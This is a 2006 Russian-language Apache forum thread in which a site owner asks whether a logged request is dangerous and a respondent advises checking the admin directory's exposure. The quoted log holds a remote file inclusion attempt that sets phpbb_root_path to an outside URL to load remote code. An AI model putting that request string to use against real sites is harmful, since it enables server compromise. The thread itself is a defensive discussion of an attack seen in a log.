Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В. Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. PHP Puzzles. Авторы: Кузнецов М.В., Симдянов И.В. Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Форум Apache

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: логи
 
 автор: ols   (22.11.2006 в 01:44)   письмо автору
 
 

этот лог, он не опасный?

Host: 64.142.100.79
 
/forum/admin/admin_board.php?phpbb_root_path=http://www.ortaksohbet.com/ll.dat?     
     Http Code: 404     Date: Nov 21 22:04:43     Http Version: HTTP/1.0     Size in Bytes: 221     
     Referer: -     
     Agent: libwww-perl/5.800

   
 
 автор: glsv (Дизайнер)   (22.11.2006 в 06:54)   письмо автору
 
   для: ols   (22.11.2006 в 01:44)
 


/forum/admin/admin_board.php?phpbb_root_path=...

Нужно смотреть код admin_board.php. Используется ли там переменная с именем admin_board.php и что будет, если ее переопределить через GET-запрос.

А почему admin директория у Вас в открытом доступе? Это как раз и опасно.

   
 
 автор: ols   (22.11.2006 в 20:30)   письмо автору
 
   для: glsv (Дизайнер)   (22.11.2006 в 06:54)
 

Всмысле в открытом доступе? Это я логи в панели управления аккуантом смотрел.

   
 
 автор: glsv (Дизайнер)   (22.11.2006 в 21:45)   письмо автору
 
   для: ols   (22.11.2006 в 20:30)
 

Насколько я вижу из логов: некто неизвестный совершенно свободно обратился к файлу forum/admin/admin_board.php. А ведь директория forum/admin, по идее должно быть защищена… и никто посторонний в нее доступ иметь не должен.

   
 
 автор: ols   (23.11.2006 в 01:51)   письмо автору
 
   для: glsv (Дизайнер)   (22.11.2006 в 21:45)
 

Ясно.
А что это за юзер агент непонятный

 Agent: libwww-perl/5.800


А если допустим я (администратор) обратился к этой дирректории? Тоесть как вы поняли что это некто "неизвестный"?

   
 
 автор: ols   (23.11.2006 в 02:18)   письмо автору
 
   для: glsv (Дизайнер)   (22.11.2006 в 21:45)
 

Ясно.
А что это за юзер агент непонятный

 Agent: libwww-perl/5.800


А если допустим я (администратор) обратился к этой дирректории? Тоесть как вы поняли что это некто "неизвестный"?

   
 
 автор: glsv (Дизайнер)   (23.11.2006 в 05:26)   письмо автору
 
   для: ols   (23.11.2006 в 02:18)
 

>А если допустим я (администратор) обратился к этой дирректории?
Тогда Вам не имеет смысла беспокоится.

>Тоесть как вы поняли что это некто "неизвестный"?
Если Вы не знаете откуда и откого пришел запрос - значит это некто "неизвестный". Даже если это неизвестный Вы сами.

>А что это за юзер агент непонятный
Обратился скрипт на Perl.

   
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования